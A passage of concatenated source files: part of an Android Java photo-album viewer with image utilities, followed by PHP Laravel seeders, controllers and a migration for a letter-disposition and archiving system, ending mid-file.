                MODE_WORLD_READABLE);
        Bundle extras = getIntent().getExtras();
        String albumID = extras.getString(ALBUM_ID);
        Integer photoID = extras.getInt(CURRENT_PHOTO_ID);
        accessToken = mPrefs.getString("access_token", null);
        Log.i(TAG, "Got access token : " + accessToken);
        Log.i(TAG, "Got albumID : " + albumID);
        Log.i(TAG, "Got photoID : " + photoID);
        dbHelper = (DBHelper) OpenHelperManager.getHelper(this, DBHelper.class);
        try {
            albumService = new AlbumServiceImpl(dbHelper.getAlbumDao());
            photoService = new PhotoServiceImpl(dbHelper.getPhotoDao());
            album = albumService.getAlbum(albumID);
            List<Photo> photos = photoService.getAlbumPhotos(album);
            fragmentAdapter = new ViewPhotoFragmentAdapter(
                    getSupportFragmentManager(), photos);
            mViewPager = (ViewPager) findViewById(R.id.pager);
            // Find the pager index of the photo the user tapped.
            // NOTE(review): if getID() returns Integer, == compares object
            // identity for boxed values — confirm it returns a primitive.
            int counter = 0;
            for (Photo photo : photos) {
                if (photo.getID() == photoID)
                    break;
                counter++;
            }
            mViewPager.setAdapter(fragmentAdapter);
            mViewPager.setCurrentItem(counter);
        } catch (SQLException e) {
            e.printStackTrace();
        } catch (NoAlbumExistsException e) {
            e.printStackTrace();
        }
        initProvider();
    }

    @Override
    protected void onDestroy() {
        super.onDestroy();
        // FIX: release the ORMLite helper (consistent with the album list
        // activity); previously the helper's reference count leaked.
        if (dbHelper != null) {
            OpenHelperManager.releaseHelper();
            dbHelper = null;
        }
    }

    /**
     * Configures the progress dialog and the download listener, and loads
     * another page of photos whenever the user swipes within
     * POSITION_TO_LOAD positions of the last loaded photo.
     */
    private void initProvider() {
        // FIX: dialogs must be created with an Activity context; using
        // getApplicationContext() causes a BadTokenException on show().
        progressDialog = new ProgressDialog(this);
        progressDialog.setCancelable(false);
        progressDialog.setMessage("Downloading photos..");
        progressDialog
                .setProgressStyle(ProgressDialog.THEME_DEVICE_DEFAULT_DARK);
        progressDialog.setProgress(0);
        progressDialog.setMax(100);
        albumPhotosProvider = new AlbumPhotosProviderImpl(photoService,
                progressDialog, accessToken);
        albumPhotosListener = new AlbumPhotosListener() {
            @Override
            public void noMorePhotos() {
                progressDialog.dismiss();
                Toast.makeText(getApplicationContext(), "No more photos",
                        Toast.LENGTH_LONG).show();
            }
            @Override
            public void error(String message) {
                Toast.makeText(getApplicationContext(), message,
                        Toast.LENGTH_LONG).show();
            }
            @Override
            public void addNewPhotos(List<Photo> photoList) {
                Log.i(TAG, "Received photos : " + photoList.size());
                if (photoList.size() > 0) {
                    fragmentAdapter.addPhotos(photoList);
                } else {
                    Toast.makeText(getApplicationContext(),
                            "No more photos to load", Toast.LENGTH_LONG).show();
                }
            }
            @Override
            public void startingDownload() {
                Toast.makeText(getApplicationContext(),
                        "Loading more photos..", Toast.LENGTH_LONG).show();
            }
        };
        mViewPager.setOnPageChangeListener(new OnPageChangeListener() {
            @Override
            public void onPageSelected(int position) {
                Photo currentPhoto = fragmentAdapter.getPhoto(mViewPager
                        .getCurrentItem());
                if (position > fragmentAdapter.getCount() - POSITION_TO_LOAD) {
                    albumPhotosProvider.loadMore(albumPhotosListener,
                            currentPhoto, album, fragmentAdapter.getCount());
                }
            }
            @Override
            public void onPageScrolled(int arg0, float arg1, int arg2) {
            }
            @Override
            public void onPageScrollStateChanged(int arg0) {
            }
        });
    }
}
<file_sep>/src/com/lopefied/pepemon/util/ImageUtils.java
package com.lopefied.pepemon.util;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.util.List;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.pm.ResolveInfo;
import android.content.res.Resources;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.graphics.Matrix;
import android.media.ExifInterface;
import android.net.Uri;
import android.util.Log;
import android.widget.ImageView;
/**
* @author <NAME>
*/
public class ImageUtils {
    public static final String TAG = ImageUtils.class.getSimpleName();

    /**
     * Decodes a drawable resource scaled down (via inSampleSize) to
     * approximately the requested width and height.
     */
    public static Bitmap decodeSampledBitmapFromResource(Resources res,
            int resId, int reqWidth, int reqHeight) {
        // First decode with inJustDecodeBounds=true to check dimensions
        final BitmapFactory.Options options = new BitmapFactory.Options();
        options.inJustDecodeBounds = true;
        BitmapFactory.decodeResource(res, resId, options);
        // Calculate inSampleSize
        options.inSampleSize = calculateInSampleSize(options, reqWidth,
                reqHeight);
        // Decode bitmap with inSampleSize set
        options.inJustDecodeBounds = false;
        return BitmapFactory.decodeResource(res, resId, options);
    }

    /**
     * Computes an inSampleSize so the decoded image roughly matches the
     * requested dimensions; 1 means no scaling.
     */
    public static int calculateInSampleSize(BitmapFactory.Options options,
            int reqWidth, int reqHeight) {
        // Raw height and width of image
        final int height = options.outHeight;
        final int width = options.outWidth;
        int inSampleSize = 1;
        if (height > reqHeight || width > reqWidth) {
            // Scale based on the smaller dimension so the result still
            // covers the requested box.
            if (width > height) {
                inSampleSize = Math.round((float) height / (float) reqHeight);
            } else {
                inSampleSize = Math.round((float) width / (float) reqWidth);
            }
        }
        return inSampleSize;
    }

    /**
     * Decodes a drawable resource as a ~70px thumbnail using a
     * power-of-two sample size.
     * NOTE(review): despite the name, this reads a resource, not a file,
     * and the reqWidth/reqHeight parameters are unused — confirm intent.
     */
    public static Bitmap decodeFile(Resources res, int resId, int reqWidth,
            int reqHeight) {
        // Decode image size
        BitmapFactory.Options o = new BitmapFactory.Options();
        o.inJustDecodeBounds = true;
        BitmapFactory.decodeResource(res, resId, o);
        // The new size we want to scale to
        final int REQUIRED_SIZE = 70;
        // Find the correct scale value. It should be the power of 2.
        int scale = 1;
        while (o.outWidth / scale / 2 >= REQUIRED_SIZE
                && o.outHeight / scale / 2 >= REQUIRED_SIZE)
            scale *= 2;
        // Decode with inSampleSize
        BitmapFactory.Options o2 = new BitmapFactory.Options();
        o2.inSampleSize = scale;
        return BitmapFactory.decodeResource(res, resId, o2);
    }

    /**
     * Decodes the image file at {@code directory} scaled to roughly
     * width x height and rotated by {@code rotate} degrees.
     */
    public static Bitmap toBitmap(String directory, Integer width,
            Integer height, Integer rotate) {
        Log.i(TAG, "Received width : " + width + " height : " + height);
        BitmapFactory.Options bmOptions = new BitmapFactory.Options();
        bmOptions.inJustDecodeBounds = true;
        BitmapFactory.decodeFile(directory, bmOptions);
        int photoW = bmOptions.outWidth;
        int photoH = bmOptions.outHeight;
        // Determine how much to scale down the image
        int scaleFactor = Math.min(photoW / width, photoH / height);
        // Decode the image file into a Bitmap sized to fill the
        // View
        bmOptions.inJustDecodeBounds = false;
        bmOptions.inSampleSize = scaleFactor;
        bmOptions.inPurgeable = true;
        Bitmap bitmap = BitmapFactory.decodeFile(directory, bmOptions);
        Matrix rotateRight = new Matrix();
        rotateRight.preRotate(rotate);
        bitmap = Bitmap.createBitmap(bitmap, 0, 0, bitmap.getWidth(),
                bitmap.getHeight(), rotateRight, true);
        return bitmap;
    }

    /**
     * Writes the bitmap to {@code file} as PNG.
     * The quality argument is ignored for lossless PNG output.
     */
    public static void saveAndCompressImageToSDCard(Bitmap bitmap, File file) {
        // FIX: File.getTotalSpace() reports the size of the whole
        // partition; file.length() is the actual file size.
        Log.i(TAG, "Photo size : " + file.length());
        FileOutputStream fs = null;
        try {
            fs = new FileOutputStream(file);
            bitmap.compress(Bitmap.CompressFormat.PNG, 90, fs);
            fs.flush();
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } finally {
            // FIX: close the stream on all paths; previously it leaked
            // whenever compress() or flush() threw.
            if (fs != null) {
                try {
                    fs.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        }
        Log.i(TAG, "Compressed photo size : " + file.length());
    }

    /** Returns true if at least one activity can handle the given action. */
    public static boolean isIntentAvailable(Context context, String action) {
        final PackageManager packageManager = context.getPackageManager();
        final Intent intent = new Intent(action);
        List<ResolveInfo> list = packageManager.queryIntentActivities(intent,
                PackageManager.MATCH_DEFAULT_ONLY);
        return list.size() > 0;
    }

    /**
     * Reads the photo's EXIF orientation tag and maps it to a rotation in
     * degrees (0, 90, 180 or 270). Returns 0 on any failure.
     */
    public static int getCameraPhotoOrientation(Context context, Uri imageUri,
            String imagePath) {
        int rotate = 0;
        try {
            context.getContentResolver().notifyChange(imageUri, null);
            File imageFile = new File(imagePath);
            ExifInterface exif = new ExifInterface(imageFile.getAbsolutePath());
            int orientation = exif.getAttributeInt(
                    ExifInterface.TAG_ORIENTATION,
                    ExifInterface.ORIENTATION_NORMAL);
            switch (orientation) {
            case ExifInterface.ORIENTATION_ROTATE_270:
                rotate = 270;
                break;
            case ExifInterface.ORIENTATION_ROTATE_180:
                rotate = 180;
                break;
            case ExifInterface.ORIENTATION_ROTATE_90:
                rotate = 90;
                break;
            }
            Log.v(TAG, "Exif orientation: " + orientation);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return rotate;
    }
}
<file_sep>/src/com/lopefied/pepemon/fragment/ViewPhotoFragmentAdapter.java
package com.lopefied.pepemon.fragment;
import java.util.List;
import com.lopefied.pepemon.db.model.Photo;
import android.os.Bundle;
import android.support.v4.app.Fragment;
import android.support.v4.app.FragmentManager;
import android.support.v4.app.FragmentStatePagerAdapter;
public class ViewPhotoFragmentAdapter extends FragmentStatePagerAdapter {
private List<Photo> photos;
public ViewPhotoFragmentAdapter(FragmentManager fm, List<Photo> photos) {
super(fm);
this.photos = photos;
}
@Override
public Fragment getItem(int i) {
Fragment fragment = new PhotoFragment();
if (i < getCount()) {
Bundle args = new Bundle();
args.putString(PhotoFragment.ARG_IMAGE_URL, photos.get(i)
.getPhotoURL());
fragment.setArguments(args);
}
return fragment;
}
public Photo getPhoto(int position) {
return photos.get(position);
}
public void addPhotos(List<Photo> photos) {
this.photos.addAll(photos);
}
@Override
public int getCount() {
return photos.size();
}
} | d2ed31c2c2fb42417e10f44ec615a4485d3ec2ba | [
"Java"
] | 13 | Java | z0lope0z/pepemon | 297ae4de7238c54550961482cbb8f2c705e4d7f5 | f997c03fb7801bde72f5bfbab616e12506b98126 |
refs/heads/master | <file_sep><?php
use Illuminate\Database\Seeder;
use Illuminate\Support\Facades\DB;
class RoleSeeder extends Seeder
{
/**
* Run the database seeds.
*
* @return void
*/
public function run()
{
DB::table('roles')->insert([
'role' => 'Ketua BPS',
]);
DB::table('roles')->insert([
'role' => 'Sub. Bag. TU',
]);
DB::table('roles')->insert([
'role' => 'Sub. Bag. Kasie. Produksi',
]);
DB::table('roles')->insert([
'role' => 'Sub. Bag. Kasie. Sosial',
]);
DB::table('roles')->insert([
'role' => 'Sub. Bag. Kasie. Distribusi',
]);
DB::table('roles')->insert([
'role' => 'Sub. Bag. Kasie. Nerwilis',
]);
DB::table('roles')->insert([
'role' => 'Sub. Bag. Kasie. IPDS',
]);
DB::table('roles')->insert([
'role' => 'Resepsionis',
]);
}
}
<file_sep><?php
use Illuminate\Database\Seeder;
use Illuminate\Support\Facades\DB;
use Illuminate\Support\Facades\Hash;
class UserSeeder extends Seeder
{
/**
* Run the database seeds.
*
* @return void
*/
public function run()
{
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'Daigo',
'role_id' =>'1',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::make('<PASSWORD>'),
]);
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'User',
'role_id' =>'2',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::<PASSWORD>('<PASSWORD>'),
]);
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'diablo',
'role_id' =>'3',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::make('<PASSWORD>'),
]);
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'User2',
'role_id' =>'4',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::make('<PASSWORD>'),
]);
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'User3',
'role_id' =>'5',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::make('<PASSWORD>'),
]);
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'User4',
'role_id' =>'6',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::make('<PASSWORD>'),
]);
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'user5',
'role_id' =>'7',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::make('<PASSWORD>'),
]);
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'User6',
'role_id' =>'8',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::make('<PASSWORD>'),
]);
}
}
<file_sep><?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Disposisi;
use App\Arsip;
use File;
class HomeController extends Controller
{
    /**
     * Create a new controller instance.
     *
     * @return void
     */
    public function __construct()
    {
        $this->middleware('auth');
    }

    /**
     * Show the application dashboard with letter statistics scoped to the
     * authenticated user's role.
     *
     * @return \Illuminate\Contracts\Support\Renderable
     */
    public function index()
    {
        $role = auth()->user()->role->role;

        $data = [
            // All disposisi records, for the dashboard table.
            'disposisi' => Disposisi::all(),
            // Incoming / outgoing archived letters addressed to this role.
            'masuk'     => Arsip::where('jenis_surat', "surat masuk")->where('kepada', $role)->count(),
            'keluar'    => Arsip::where('jenis_surat', "surat keluar")->where('kepada', $role)->count(),
            // Disposisi directed to this role / archives originating from it.
            'dis'       => Disposisi::all()->where('kepada', $role)->count(),
            'arsip'     => Arsip::all()->where('dari', $role)->count(),
            // Notification badges: status 2 (disposed) and status 1 (new).
            'hitung'    => Disposisi::where('status', 2)->count(),
            'count'     => Disposisi::where('status', 1)->count(),
        ];

        return view('home', $data);
    }
}
<file_sep><?php
use Illuminate\Support\Facades\Schema;
use Illuminate\Database\Schema\Blueprint;
use Illuminate\Database\Migrations\Migration;
class Disposisi extends Migration
{
    /**
     * Run the migrations: create the "disposisi" table that tracks an
     * incoming letter through the disposition workflow.
     *
     * @return void
     */
    public function up()
    {
        Schema::create('disposisi', function (Blueprint $table) {
            $table->bigIncrements('id');
            $table->string('surat_dari');
            $table->date('tgl_surat');
            $table->date('tgl_terima');
            $table->string('no_surat');
            $table->unsignedBigInteger('no_agenda');
            $table->string('perihal');
            // NOTE(review): 'aktor' has no default and is not nullable, but
            // DisposisiController::create_resepsionis never supplies it —
            // confirm the insert does not fail on strict SQL modes.
            $table->string('aktor');
            // Workflow state: 1 = received, 2 = disposed, 3 = read, 4 = archived.
            $table->unsignedBigInteger('status');
            $table->enum('kepada',['Sdr. Ka. Sub. Bag. TU','Sdr. Ka. Sub. Bag. Kasie Produksi','Sdr. Ka. Sub. Bag. Kasie Sosial','Sdr. Ka. Sub. Bag. Kasie Distribusi','Sdr. Ka. Sub. Bag. Kasie Nerwilis','Sdr. Ka. Sub. Bag. Kasie IPDS']);
            $table->text('isi_disposisi');
            $table->string('diteruskan_kpd');
            $table->timestamps();
        });
    }

    /**
     * Reverse the migrations: drop the "disposisi" table.
     * FIX: this was previously empty, so the migration could never be
     * rolled back.
     *
     * @return void
     */
    public function down()
    {
        Schema::dropIfExists('disposisi');
    }
}
<file_sep><?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use\App\User;
use\App\Disposisi;
use\File;
class UserController extends Controller
{
    /**
     * Display a listing of the resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function __construct()
    {
        // Every action in this controller requires an authenticated user.
        $this->middleware('auth');
    }
    public function index()
    {
        // Badge count: disposisi still awaiting the head's action (status 1).
        $count = Disposisi::where('status',1)->count();
        $user = User::all();
        $disposisi = Disposisi::all();
        return view('ketua_tu.user', compact('user', 'disposisi'))->with('count', $count);
    }
    /**
     * Show the form for creating a new resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function tambah(){
        // $acak: current user count, used by the form (e.g. for numbering).
        $acak = User::all()->count();
        $count = Disposisi::where('status',1)->count();
        $user = User::all();
        $disposisi = Disposisi::all();
        return view('/ketua_tu/create', compact('count', 'disposisi', 'acak'))->with('count', $count);
    }
    public function create(Request $request)
    {
        // NOTE(review): the new user is stored without a password — confirm
        // how the first login / password setup is handled.
        $this->validate($request,[
            'name' => ['required'],
            'role_id' => ['required'],
            'nip' => ['required'],
            'email' => ['required'],
        ]);
        User::create([
            'name' => $request->name,
            'role_id' => $request->role_id,
            'nip' => $request->nip,
            'email' => $request->email,
            'foto' => 'default.jpg'
        ]);
        return redirect('user');
    }
    /**
     * Store a newly created resource in storage.
     * (Unused scaffold stub; creation is handled by create() above.)
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function store(Request $request)
    {
        //
    }
    /**
     * Display the specified resource. (Unused scaffold stub.)
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function show($id)
    {
        //
    }
    /**
     * Show the form for editing the specified resource. (Unused scaffold stub.)
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function edit($id)
    {
        //
    }
    /**
     * Update the specified resource in storage. (Unused scaffold stub.)
     *
     * @param  \Illuminate\Http\Request  $request
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function update(Request $request, $id)
    {
        //
    }
    /**
     * Remove the specified resource from storage.
     * NOTE(review): no authorization check beyond 'auth' middleware —
     * confirm only the head of TU can reach this route.
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function destroy($id)
    {
        User::where('id',$id)->delete();
        return redirect('user');
    }
}
<file_sep><?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Disposisi;
use File;
class DisposisiController extends Controller
{
    /**
     * Disposition workflow controller.
     *
     * Status codes used throughout (grounded in this class):
     *   1 = entered by the receptionist (create_resepsionis)
     *   2 = disposed by the head (update2)
     *   3 = opened/read by the receptionist (show)
     */
    public function __construct()
    {
        // Every action requires an authenticated user.
        $this->middleware('auth');
    }
    /** Receptionist: list all disposisi with a status-2 notification badge. */
    public function resepsionis_list()
    {
        $count = Disposisi::where('status',2)->count();
        $hitung = Disposisi::where('status',2)->count();
        $disposisi = Disposisi::all();
        $notif = Disposisi::where('status',2)->get();
        return view('/resepsionis/list', compact('count', 'hitung', 'disposisi', 'notif'))->with('count', $count);
    }
    /** Head of TU: list all disposisi with a status-1 (new) badge. */
    public function ketua_tu_list()
    {
        $count = Disposisi::where('status',1)->count();
        $disposisi = Disposisi::all();
        return view('/ketua_tu/list',['disposisi' => $disposisi])->with('count', $count);
    }
    /**
     * Receptionist: register a newly received letter; it enters the
     * workflow with status 1 (awaiting disposition).
     */
    public function create_resepsionis(Request $request)
    {
        $this->validate($request,[
            'surat_dari' => ['required','min:5','max:20'],
            'tgl_surat' => ['required'],
            'tgl_terima' => ['required'],
            'no_surat' => ['required'],
            'no_agenda' => ['required'],
            'perihal' => ['required']
        ]);
        Disposisi::create([
            'surat_dari' => $request->surat_dari,
            'tgl_surat' => $request->tgl_surat,
            'tgl_terima' => $request->tgl_terima,
            'no_surat' => $request->no_surat,
            'no_agenda' => $request->no_agenda,
            'perihal' => $request->perihal,
            'status' => '1'
        ]);
        return redirect('disposisi');
    }
    /** Receptionist: show the "new disposisi" form. */
    public function create(){
        $count = Disposisi::where('status',2)->count();
        $hitung = Disposisi::where('status',2)->count();
        $disposisi = Disposisi::where('aktor','resepsionis')->get();
        return view('resepsionis/create',['disposisi' => $disposisi], ['hitung'=>$hitung])->with('count', $count);
    }
    /**
     * Store a newly created resource in storage. (Unused scaffold stub;
     * creation is handled by create_resepsionis().)
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function store(Request $request)
    {
        //
    }
    /**
     * Receptionist: open one disposisi; opening it marks the record as
     * read (status 3).
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function show(Request $request, $id)
    {
        $count = Disposisi::where('status',2)->count();
        $hitung = Disposisi::where('status',2)->count();
        $disposisi = Disposisi::where('aktor','resepsionis')->get();
        $show = Disposisi::where('id',$id)->get();
        // Side effect: viewing flips the record to status 3 (read).
        // NOTE(review): this updates $request->id, not the route $id —
        // confirm both always match.
        Disposisi::where('id',$request->id)->update([
            'status' => '3'
        ]);
        return view('/resepsionis/show', ['disposisi' => $show], ['hitung'=>$hitung])->with('count', $count);
    }
    /**
     * Receptionist: edit form for the basic letter fields.
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function edit($id)
    {
        $count = Disposisi::where('status',2)->count();
        $hitung = Disposisi::where('status',2)->count();
        $disposisi = Disposisi::where('aktor','resepsionis')->get();
        $edit = Disposisi::where('id',$id)->get();
        return view('/resepsionis/edit', ['disposisi' => $edit], ['hitung'=>$hitung])->with('count', $count);
    }
    /**
     * Head of TU: edit form for the disposition fields of a status-1 record.
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function edit2($id)
    {
        $count = Disposisi::where('status',1)->count();
        $disposisi = Disposisi::where('status',1)->get();
        $edit = Disposisi::where('id',$id)->get();
        return view('/ketua_tu/edit', ['disposisi' => $edit])->with('count', $count);
    }
    /**
     * Receptionist: update the basic letter fields (status unchanged).
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function update(Request $request)
    {
        $this->validate($request,[
            'surat_dari' => ['required','min:5','max:20'],
            'tgl_surat' => ['required'],
            'tgl_terima' => ['required'],
            'no_surat' => ['required'],
            'no_agenda' => ['required'],
            'perihal' => ['required']
        ]);
        Disposisi::where('id',$request->id)->update([
            'surat_dari' => $request->surat_dari,
            'tgl_surat' => $request->tgl_surat,
            'tgl_terima' => $request->tgl_terima,
            'no_surat' => $request->no_surat,
            'no_agenda' => $request->no_agenda,
            'perihal' => $request->perihal,
        ]);
        return redirect('disposisi');
    }
    /**
     * Head of TU: record the disposition (recipient, instructions,
     * forwarding) and advance the record to status 2 (disposed).
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function update2(Request $request)
    {
        $this->validate($request,[
            'kepada' => ['required'],
            'isi_disposisi' => ['required'],
            'diteruskan_kpd' => ['required'],
        ]);
        Disposisi::where('id',$request->id)->update([
            'kepada' => $request->kepada,
            'isi_disposisi' => $request->isi_disposisi,
            'diteruskan_kpd' => $request->diteruskan_kpd,
            'status' => '2'
        ]);
        return redirect('disposisi2');
    }
    /**
     * Remove the specified resource from storage. (Unused scaffold stub.)
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function destroy($id)
    {
        //
    }
}
<file_sep><?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Disposisi;
use App\Arsip;
use App\Surat;
use App\Auth;
use File;
class SuratController extends Controller
{
/**
* Display a listing of the resource.
*
* @return \Illuminate\Http\Response
*/
public function __construct()
{
$this->middleware('auth');
}
public function index()
{
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::where('status',2)->orWhere('status',3)->get();
$all=Disposisi::all();
return view('/user/surat',compact('disposisi', 'all'))->with('count', $count);
}
public function masuk_resepsionis()
{
$count = Disposisi::where('status',2)->count();
$hitung = Disposisi::where('status',2)->count();
$disposisi = Disposisi::where('status',2)->orWhere('status',3)->get();
$all=Disposisi::all();
return view('/resepsionis/masuk',compact('disposisi', 'all', 'hitung'))->with('count', $count);
}
public function masuk_ketua_tu()
{
$count = Disposisi::where('status',1)->count();
$disposisi = Disposisi::where('status',1)->get();
$all=Disposisi::all();
return view('/ketua_tu/masuk',compact('disposisi', 'all'))->with('count', $count);
}
/**
* Show the form for creating a new resource.
*
* @return \Illuminate\Http\Response
*/
public function create(Request $request, $id)
{
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::where('status',2)->orWhere('status',3)->get();
$show = Disposisi::where('id',$id)->get();
return view('/user/baca', ['disposisi' => $show])->with('count', $count);
}
public function create_keluar(Request $request){
$nomer=Surat::count();
$this->validate($request,[
'no_surat' => ['required'],
'kepada' => ['required'],
'perihal' => ['required'],
'isi_surat' => ['required']
]);
Surat::create([
'no_surat' => $request->no_surat,
'kepada' => $request->kepada,
'perihal' => $request->perihal,
'isi_surat' => $request->isi_surat,
'dari' => $request->dari
]);
return redirect('/surat_keluar')->with('nomer', $nomer);
}
/**
* Store a newly created resource in storage.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function store(Request $request)
{
Arsip::create([
'surat_dari' => $request->surat_dari,
'tgl_surat' => $request->tgl_surat,
'tgl_terima' => $request->tgl_terima,
'no_surat' => $request->no_surat,
'no_agenda' => $request->no_agenda,
'perihal' => $request->perihal,
'kepada' => $request->kepada,
'isi_disposisi' => $request->isi_disposisi,
'diteruskan_kepada' => $request->diteruskan_kpd,
'jenis_surat' => 'surat masuk',
'milik' => $request->milik
]);
Disposisi::where('id',$request->id)->update([
'status' => '4'
]);
return redirect('/surat_masuk');
}
public function arsipkan(Request $request){
Surat::where('id',$request->id)->update([
'status' => '2'
]);
Arsip::create([
'no_surat' => $request->no_surat,
'perihal' => $request->perihal,
'kepada' => $request->kepada,
'isi_surat' => $request->isi_surat,
'jenis_surat' => 'surat keluar',
'surat_dari' => $request->surat_dari,
'milik' => $request->milik
]);
return redirect('/surat_keluar');
}
public function tombol(Request $request){
Surat::where('id',$request->id)->update([
'status' => '2'
]);
Arsip::create([
'no_surat' => $request->no_surat,
'perihal' => $request->perihal,
'kepada' => $request->kepada,
'isi_surat' => $request->isi_surat,
'jenis_surat' => 'surat keluar',
'surat_dari' => $request->surat_dari
]);
return redirect('/surat_keluar');
}
public function tombol2(Request $request){
Surat::where('id',$request->id)->update([
'status' => '0'
]);
return redirect('/surat_keluar');
}
public function cari(Request $request){
$dari = $request->dari;
$sampai = $request->sampai;
$jenis = $request->jenis;
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::all();
$arsip = Arsip::whereBetween('updated_at', [$dari, $sampai])->Where('jenis_surat', $jenis)->Where('milik', auth()->user()->role->role)->get();
return view('user.arsip', compact('arsip', 'disposisi'))->with('count', $count);
}
public function resepsionis_cari(Request $request){
$dari = $request->dari;
$sampai = $request->sampai;
$jenis = $request->jenis;
$count = Disposisi::where('status',2)->count();
$hitung = Disposisi::where('status',2)->count();
$disposisi = Disposisi::all();
$arsip = Arsip::whereBetween('updated_at', [$dari, $sampai])->Where('jenis_surat', $jenis)->get();
return view('resepsionis.arsip', compact('arsip', 'disposisi', 'hitung'))->with('count', $count);
}
public function ketua_tu_cari(Request $request){
$dari = $request->dari;
$sampai = $request->sampai;
$jenis = $request->jenis;
$count = Disposisi::where('status',2)->count();
$disposisi = Disposisi::all();
$arsip = Arsip::whereBetween('updated_at', [$dari, $sampai])->Where('jenis_surat', $jenis)->get();
return view('ketua_tu.arsip', compact('arsip', 'disposisi'))->with('count', $count);
}
public function lihat(Request $request, $id){
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::all();
$show = Surat::where('id',$id)->get();
return view('/user/show', ['show' => $show], ['disposisi' => $disposisi])->with('count', $count);
}
/**
* Display the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function show(Request $request)
{
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::all();
$outs = Surat::where('status',2)->get();
$arsip = Arsip::all();
return view('user.arsip', compact('arsip', 'disposisi', 'outs'))->with('count', $count);
}
public function resepsionis_show(Request $request)
{
$count = Disposisi::where('status',2)->count();
$hitung = Disposisi::where('status',2)->count();
$disposisi = Disposisi::all();
$outs = Surat::where('status',2)->get();
$arsip = Arsip::where('milik', auth()->user()->role->role);
return view('resepsionis.arsip', compact('arsip', 'disposisi', 'outs', 'hitung'))->with('count', $count);
}
public function ketua_tu_show(Request $request)
{
$count = Disposisi::where('status',2)->count();
$disposisi = Disposisi::all();
$outs = Surat::where('status',2)->get();
$arsip = Arsip::all();
return view('ketua_tu.arsip', compact('arsip', 'disposisi', 'outs'))->with('count', $count);
}
public function create_form(Request $request)
{
$nomer=Surat::count();
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::all();
$arsip = Arsip::all();
return view('/user/create',['arsip' => $arsip], ['disposisi' => $disposisi])->with('count', $count)->with('nomer', $nomer);
}
public function keluar(Request $request){
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::all();
$keluar = Surat::all();
return view('/user/keluar',['keluar' => $keluar], ['disposisi' => $disposisi])->with('count', $count);
}
public function resepsionis_keluar(Request $request){
$count = Disposisi::where('status',2)->count();
$hitung = Disposisi::where('status',2)->count();
$disposisi = Disposisi::all();
$keluar = Surat::all();
return view('/resepsionis/keluar',compact('disposisi', 'keluar', 'hitung'))->with('count', $count);
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function edit($id)
{
$count = Disposisi::where('status', 2)->orWhere('status', 3)->count();
$disposisi = Disposisi::all();
// Kept from the original even though the view below only receives $edit.
$keluar = Surat::all();
// The edit view reuses the 'keluar' key, but only with the selected letter.
$edit = Surat::where('id', $id)->get();
return view('/user/edit', [
'keluar' => $edit,
'disposisi' => $disposisi,
'count' => $count,
]);
}
/**
